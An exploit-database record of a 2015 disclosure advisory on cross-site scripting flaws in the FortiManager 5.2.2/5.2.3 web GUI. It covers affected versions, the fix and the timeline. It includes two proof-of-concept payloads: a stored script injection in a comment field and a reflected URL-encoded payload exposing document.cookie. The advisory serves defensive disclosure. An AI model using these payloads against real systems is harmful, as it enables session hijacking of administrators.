{"lastseen": "2020-04-01T19:04:16", "references": [], "description": "\nFortiManager 5.2.2 - Persistent Cross-Site Scripting", "edition": 1, "reporter": "hyp3rlinx", "exploitpack": {"type": "webapps", "platform": "cgi"}, "published": "2015-09-25T00:00:00", "title": "FortiManager 5.2.2 - Persistent Cross-Site Scripting", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-09-25T00:00:00", "id": "EXPLOITPACK:6422E6C197B73E29CE6554A9554ED90F", "href": "", "viewCount": 3, "sourceData": "[+] Credits: hyp3rlinx\n\n[+] Website: hyp3rlinx.altervista.org\n\n[+] Source:\nhttp://hyp3rlinx.altervista.org/advisories/AS-FORTIMANAGER-XSS-0924.txt\n\n\n\nVendor:\n================================\nwww.fortinet.com\n\n\n\nProduct:\n================================\nFortiManager v5.2.2\n\nFortiManager is a centralized security management appliance that allows you\nto\ncentrally manage any number of Fortinet Network Security devices.\n\n\nVulnerability Type:\n===================\nMultiple Cross Site Scripting ( XSS ) in FortiManager GUI\nhttp://www.fortiguard.com/advisory/multiple-xss-vulnerabilities-in-fortimanager-gui\n\n\n\nCVE Reference:\n==============\nPending\n\n\n\n\n\nVulnerability Details:\n=====================\n\nThe Graphical User Interface (GUI) of FortiManager v5.2.2 is\nvulnerable to two reflected Cross-Site Scripting (XSS) vulnerabilities.\n2 potential XSS vectors were identified:\n\n* XSS vulnerability in SOMVpnSSLPortalDialog.\n* XSS vulnerability in FGDMngUpdHistory.\n\nThe Graphical User Interface (GUI) of FortiManager v5.2.3 is vulnerable to\none reflected XSS vulnerability and one stored XSS vulnerability.\n2 potential XSS vectors were identified:\n\n* XSS vulnerability in sharedjobmanager.\n* XSS vulnerability in SOMServiceObjDialog.\n\nAffected Products\n\nXSS items 1-2: FortiManager v5.2.2 or earlier.\nXSS items 3-4: FortiManager v5.2.3 or earlier.\n\n\nSolutions:\n===========\nNo workarounds are currently available.\nUpdate to FortiManager v5.2.4.\n\n\nExploit code(s):\n===============\n\n1- Persistent:\nhttps://localhost/cgi-bin/module/sharedobjmanager/firewall/SOMServiceObjDialog?devGrpId=18446744073709551615&deviceId=18446744073709551615&vdom=&adomId=3&vdomID=0&adomType=ems&cate=167&prodId=0&key=ALL&catetype=167&cate=167&permit_w=1&roid=189&startIndex=0&results=50\n\n<div class=\"ui-comments-div\"><textarea id=\"_comp_15\" name=\"_comp_15\"\nclass=\"ui-comments-text\" cols=\"58\" maxlength=\"255\"\n maxnum=\"255\" placeholder=\"Write a comment\"\nrows=\"1\"><script>alert(666)</script></textarea><label\nclass=\"ui-comments-remaining\">\n\n\n2- Reflected\nhttps://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]\\n\\n%27%2bdocument.cookie%29%3C/script%3E\n<https://localhost/cgi-bin/module/sharedobjmanager/policy_new/874/PolicyTable?vdom=%22%27/%3E%3C/script%3E%3Cscript%3Ealert%28%27[XSS%20FortiManager%20POC%20VM64%20v5.2.2%2008042015%20]%5Cn%5Cn%27%2bdocument.cookie%29%3C/script%3E>\n\n\n\nDisclosure Timeline:\n=========================================================\nVendor Notification: August 4, 2015\nSeptember 24, 2015 : Public Disclosure\n\n\n\n\nExploitation Technique:\n=======================\nRemote & Local\n\n\n\nSeverity Level:\n=========================================================\nMedium (3)\n\n\n\n\nDescription:\n==========================================================\n\n\nRequest Method(s): [+] GET\n\n\nVulnerable Product: [+] FortiManager v5.2.2 & v5.2.3 or earlier\n\n\nVulnerable Parameter(s): [+] vdom, textarea field\n\n\nAffected Area(s): [+] sharedobjmanager, SOMServiceObjDialog\n\n\n===========================================================\n\n[+] Disclaimer\nPermission is hereby granted for the redistribution of this advisory,\nprovided that it is not altered except by reformatting it, and that due\ncredit is given. Permission is explicitly given for insertion in\nvulnerability databases and similar, provided that due credit is given to\nthe author.\nThe author is not responsible for any misuse of the information contained\nherein and prohibits any malicious use of all security related information\nor exploits by the author or elsewhere.\n\nby hyp3rlinx", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645716659, "score": 1659814272}, "_internal": {"score_hash": "60492212780f6cc5e086231086a95026"}}
FortiManager 5.2.2 - Persistent Cross-Site Scripting